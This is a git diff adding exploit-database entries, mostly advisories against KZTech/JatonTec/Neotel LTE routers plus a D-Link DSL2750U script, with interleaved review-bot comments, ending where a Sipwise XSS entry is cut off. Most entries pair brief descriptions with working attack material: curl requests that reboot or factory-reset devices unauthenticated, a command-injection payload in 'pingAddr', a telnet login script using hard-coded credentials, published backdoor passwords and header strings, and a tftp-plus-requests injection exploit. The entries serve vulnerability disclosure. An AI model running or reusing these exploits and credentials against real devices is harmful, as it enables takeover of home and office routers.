diff --git a/exploits/hardware/dos/49685.txt b/exploits/hardware/dos/49685.txt
new file mode 100644
index 000000000..1d2d9a81b
--- /dev/null
+++ b/exploits/hardware/dos/49685.txt
@@ -0,0 +1,68 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: The device allows unauthenticated attackers to restart the +device with an HTTP GET request to /goform/RestartDevice page. 
+ +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5643 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5643.php + + +03.02.2021 + +-- + + +$ curl -sk https://192.168.1.1/goform/RestartDevice +success +$ \ No newline at end of file diff --git a/exploits/hardware/remote/49682.txt b/exploits/hardware/remote/49682.txt new file mode 100644 index 000000000..8639bb59d --- /dev/null +++ b/exploits/hardware/remote/49682.txt 
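Review bot: The header block (`Exploit Title` through `Advisory URL`) records a discovery date and advisory ID but no `Fix:` or `Workaround:` field, so a reader cannot tell whether any vendor build closes the unauthenticated `/goform/RestartDevice` call shown after `--`. The same header is copied verbatim into 49682, 49680, 49681, 49683, 49684 and 49686 in this commit, so a single line per file such as `Fix: <vendor patch status at publication>` would resolve it for all of them. The `Affected version` table lists sixteen models while `Tested on` names one firmware/SDK combination; a sentence stating which rows were verified on hardware and which are inferred from the shared firmware line would make the scope claim checkable.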
@@ -0,0 +1,92 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: The device utilizes hard-coded credentials within its Linux +distribution image. These sets of credentials are never exposed to +the end-user and cannot be changed through any normal operation of +the router. 
+ +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5637 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php + + +03.02.2021 + +-- + + +Default web creds: +------------------ +admin:admin123 +user:user123 + +Telnet/SSH access: +------------------ +admin:root123 + +=== + +import telnetlib + +host="192.168.1.1" +user="admin" +password="root123" +s=telnetlib.Telnet(host) +s.read_until(b"CPE login: ") +s.write(user.encode('ascii') + b"\n") +s.read_until(b"Password: ") +s.write(password.encode('ascii') + b"\n") +s.write(b"busybox\n") +print(s.read_all().decode('ascii')) +s.mt_interact() +s.close() \ No newline at end of file diff --git a/exploits/hardware/remote/50034.txt b/exploits/hardware/remote/50034.txt new file mode 100644 index 000000000..828ab7f44 --- /dev/null +++ b/exploits/hardware/remote/50034.txt 
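Review bot: The telnet PoC after the `===` separator pins no interpreter version, and `telnetlib` is deprecated by PEP 594 (warning since Python 3.11, removed in 3.13), so the snippet will stop importing on current interpreters; a one-line header such as `# Requires Python <= 3.12 (telnetlib)` keeps it reproducible. The `Default web creds` and `Telnet/SSH access` sections list the same `root123` and `user123` values that 49681's configuration dump shows under `TelnetPwd` and `GuestPassword`, yet neither file references the other; a `See also: ZSL-2021-5636` line here would let an operator see that the configuration export and the hard-coded accounts are one exposure.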
@@ -0,0 +1,109 @@ +# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection +# Date: 17-06-2021 +# Exploit Author: Mohammed Hadi (HadiMed) +# Vendor Homepage: https://me.dlink.com/consumer +# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16 +# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R* +# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6) + +### + +#!/bin/bash + +# Exploit by HadiMed + +# Takes advantage of the tftp server that accepts the cfg file blindly +echo -ne "\n" +echo "Exploiting Dlink DSL-2750u version 1.6" +echo -ne "\n\n" + +# Sending the payload +echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1 +echo -ne "\n" + +echo "File uploaded Successfully" +echo "Waiting for router to restart" + +sleep 180 # approximate time for router to restart + +python3 exploit.py + +### + +import requests + +# HTTP request looks like this +''' +POST /cgi-bin/webproc HTTP/1.1 +Host: 192.168.1.1 +Content-Length: 175 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://192.168.1.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.1.1/cgi-bin/webproc +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91 +Connection: close + +getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91 +''' + +# 1 Getting a session id + +# password and username crafted by me on the cfg.xml file + +username = "pwned" +password= "pwned" + + +# 
acually the client set the sessionid in condition that the password and username are correct + +Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef" +Contentty="application/x-www-form-urlencoded" +Referer="http://192.168.1.1/cgi-bin/webproc" +Contentlen="175" + +# Sending first request to set our session id +response = requests.post("http://192.168.1.1/cgi-bin/webproc", + headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } +, + data={ "getpage":"html/index.html", + "errorpage":"html/main.html", + "var:menu" : "setup", + "var:page":"wizard", + "obj-action":"auth", + ":username":username, + ":password":password, + ":action":"login", + ":sessionid":"deadbeef" +} + ) + + +Referer = "http://192.168.1.1/cgi-bin/webupg" + +name = "mac" +cmd = "1;sleep${IFS}10;reboot;" + +Contentlen = str(len(name+cmd)+10) + +if response.status_code==302: + print("got sessionid=deadbeef !\n waiting for the reverse shell ...") + +# access cgi-bin/webupg +try : + response = requests.post("http://192.168.1.1/cgi-bin/webupg", + headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } + ,data = {"name":name , "newmac":cmd} , timeout=0.0000000001 + +) + +except requests.exceptions.Timeout : + + print("done router will restart in 20 sec") + +print("Device restarted!") \ No newline at end of file diff --git a/exploits/hardware/webapps/49680.txt b/exploits/hardware/webapps/49680.txt new file mode 100644 index 000000000..d777856eb --- /dev/null +++ b/exploits/hardware/webapps/49680.txt 
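Review bot: The bash section calls `python3 exploit.py`, but nothing in the file says that the Python section after the second `###` is that script, and the `cfg.xml` uploaded by the tftp step is not part of the commit, so the two halves cannot be run from this file alone; a comment such as `# save the Python section below as exploit.py; cfg.xml is described in the linked repository` would close the gap. In the Python section `Contentlen` is computed by hand and passed as a `Content-Length` header while `requests` builds the form body itself; as far as I can tell requests recomputes that header from the encoded body, so the manual value is ignored at best and inconsistent at worst, and `Contentty` duplicates the content type that `data=` already sets, so both headers can be dropped. The status reporting is also misleading: `print("Device restarted!")` runs unconditionally, and the `Timeout` handler prints `done router will restart in 20 sec` for any timeout, including an unreachable host, so the output does not reflect what actually happened.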
@@ -0,0 +1,83 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: The application suffers from an authenticated OS command +injection vulnerability. 
This can be exploited to inject and +execute arbitrary shell commands through the 'pingAddr' HTTP +POST parameter bypassing the injection protection filter. + +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5635 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php + + +03.02.2021 + +-- + + +#JT3300V/AM3300V +lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \ + --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \ + -H "Cookie: kz_userid=admin:311139" \ + -H "X-Requested-With: XMLHttpRequest" +ping: bad address 'Linux' +lqwrm@metalgear:~/prive$ + + +#JT3500V +lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \ + --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \ + -H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \ + -H "X-Requested-With: XMLHttpRequest" +ping: bad address 'Linux' +lqwrm@metalgear:~/prive$ \ No newline at end of file diff --git a/exploits/hardware/webapps/49681.txt b/exploits/hardware/webapps/49681.txt new file mode 100644 index 000000000..968044764 --- /dev/null +++ b/exploits/hardware/webapps/49681.txt 
@@ -0,0 +1,89 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: The application suffers from an authentication bypass +vulnerability. 
An unauthenticated attacker can disclose sensitive +and clear-text information resulting in authentication bypass by +downloading the configuration of the device and revealing the +admin password. + +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5636 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php + + +03.02.2021 + +-- + + +$ curl -s \ + -o configtest.zlib \ # Default: config.dat + 'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \ + binwalk -e configtest.zlib ; \ + cd _configtest.zlib_extracted ; \ + strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \ + # cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device + cd .. + +3:Login=admin +4:Password=neotelwings +5:TelnetPwd=root123 +6:GuestId=user +7:GuestPassword=user123 +89:DDNSPassword= +239:auto_update_password= +279:Tr069_Password= +288:Tr069_ConnectionRequestPassword=admin +300:Tr069_STUNPassword= +339:telnetManagement=2 +$ \ No newline at end of file diff --git a/exploits/hardware/webapps/49683.txt b/exploits/hardware/webapps/49683.txt new file mode 100644 index 000000000..46bf530db --- /dev/null +++ b/exploits/hardware/webapps/49683.txt 
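Review bot: The curl chain after `--` is not runnable as pasted: `-o configtest.zlib \ # Default: config.dat` places a comment after a backslash-space, which ends the command before the URL on the following line, and `# cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device` breaks the chain the same way; moving both comments onto their own lines above the command keeps the `\` continuations intact. The dumped values include `Password=neotelwings`, which reads like the admin password of the specific test unit rather than a factory default (the defaults are the `root123`/`user123` values listed in 49682); `Password=<redacted>` would show the disclosure without publishing a live credential. `telnetManagement=2` is shown without explanation, and a short note on what that value means in this firmware, if known, would help operators read their own export.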
@@ -0,0 +1,124 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: The device has several backdoors and hidden pages that +allow remote code execution, overwriting of the bootrom and +enabling debug mode. 
+ +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5639 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php + + +03.02.2021 + +-- + + +Older and newer models defer in backdoor code. +By navigating to /syscmd.html or /syscmd.asp pages +an attacker can authenticate and execute system +commands with highest privileges. + +Old models (syscmd.asp) password: super1234 + +Newer models (syscmd.html) password: md5(WAN_MAC+version): + +$ curl -k https://192.168.1.1/goform/getImgVersionInfo +{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]} + +... +pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR"); + if (*pcVar6 == 0) { + pcVar6 = "6C:AD:EF:00:00:01"; + } + memset(acStack280,0,0x100); + sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210"); + ... + psMd5Init(auStack112); + psMd5Update(auStack112,local_10,local_c); + psMd5Final(auStack112,uParm1); + return; +... + + +Another 2 backdoors exist using the websCheckCookie() and specific header strings. + +... + iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb); + if (iVar2 != 0) { + return 0xffffffff; + } + if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) && + (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) { + return 0xffffffff; + ... + if (iVar1 != 0) goto LAB_0047c304; +LAB_0047c32c: + WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1); +LAB_0047c35c: + __n = strlen(__s1); + if (__n == 0) { + snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log"); + WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560); + system(acStack1560); + websWrite(iParm1,"invalid command!"); + goto LAB_0047c3f8; + } +... 
+ + +Bypass the backdoor password request and enable debug mode from within the web console: + +$('#div_check').modal('hide'); <--- syscmd.html + +g_password_check_alert.close(); <--- syscmd.asp \ No newline at end of file diff --git a/exploits/hardware/webapps/49684.txt b/exploits/hardware/webapps/49684.txt new file mode 100644 index 000000000..32978e15b --- /dev/null +++ b/exploits/hardware/webapps/49684.txt 
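Review bot: The decompiler excerpts after `--` carry placeholder names (`pcVar6`, `acStack280`, `iParm1`, `LAB_0047c304`, which look like Ghidra output) but never say which binary or function they were lifted from, so a defender cannot locate the code in their own firmware image to confirm whether a later build still contains it; a one-line caption per excerpt naming the binary and function (the `"startSysCmd"` string in the `WebsDbgLog` call suggests the second one) would make the claim verifiable. The three findings (the MD5-derived debug password, the `UPGRADE:927`/`TONY@KZT` header check, and the client-side modal bypass) are distinct weaknesses filed under one advisory ID; listing them as numbered items with the affected page for each would help map them to a fix. `defer` in `Older and newer models defer in backdoor code` should read `differ`.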
@@ -0,0 +1,72 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: The device allows unauthenticated attackers to visit the +unprotected /goform/LoadDefaultSettings endpoint and reset the +device to its factory default settings. 
Once the GET request is +made, the device will reboot with its default settings allowing +the attacker to bypass authentication and take full control of +the system. + +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5642 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php + + +03.02.2021 + +-- + + +$ curl -sk https://192.168.1.1/goform/LoadDefaultSettings +success +$ \ No newline at end of file diff --git a/exploits/hardware/webapps/49686.txt b/exploits/hardware/webapps/49686.txt new file mode 100644 index 000000000..e5535f782 --- /dev/null +++ b/exploits/hardware/webapps/49686.txt 
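Review bot: The `Desc` paragraph claims the reset lets an attacker "bypass authentication and take full control", which presumably holds only because the factory defaults are the published `admin:admin123` and `admin:root123` values of 49682 (ZSL-2021-5637); stating that dependency explicitly, e.g. `See also: ZSL-2021-5637 (default credentials restored by this reset)`, would tell operators why changing the default credentials alone does not address this issue and why the two should be fixed together.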
@@ -0,0 +1,70 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: JT3500V is vulnerable to unauthenticated configuration disclosure +when direct object reference is made to the export_settings.cgi file +using an HTTP GET request. 
This will enable the attacker to disclose +sensitive information and help her in authentication bypass, privilege +escalation and full system access. + +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5644 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php + + +03.02.2021 + +-- + + +$ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat +8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb 4 11:31 config.dat \ No newline at end of file diff --git a/exploits/hardware/webapps/49800.html b/exploits/hardware/webapps/49800.html new file mode 100644 index 000000000..041cb570b --- /dev/null +++ b/exploits/hardware/webapps/49800.html 
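Review bot: The PoC fetches the same `/cgi-bin/export_settings.cgi` that 49681 (ZSL-2021-5636) already uses as the first step of its authentication bypass, over HTTPS here and over `:8080` HTTP there, yet neither file references the other; a `See also: ZSL-2021-5636` line plus a statement of which listeners serve the export without authentication would let a defender check both exposure paths. The `ls -alsth` output also shows the analyst's workstation username, which is unrelated to the finding and could be trimmed.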
@@ -0,0 +1,112 @@ +# Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS) +# Date: 13.04.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.sipwise.com + +Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities + + +Vendor: Sipwise GmbH +Product web page: https://www.sipwise.com +Affected version: <=CE_m39.3.1 + NGCP www_admin version 3.6.7 + +Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform) +is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide +rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail, +conferencing etc.) that can be configured by end users in the self-care web interface. +For operators, it offers a web-based administrative panel that allows them to configure +subscribers, SIP peerings, billing profiles, and other entities. The administrative web +panel also shows the real-time statistics for the whole system. For tight integration +into existing 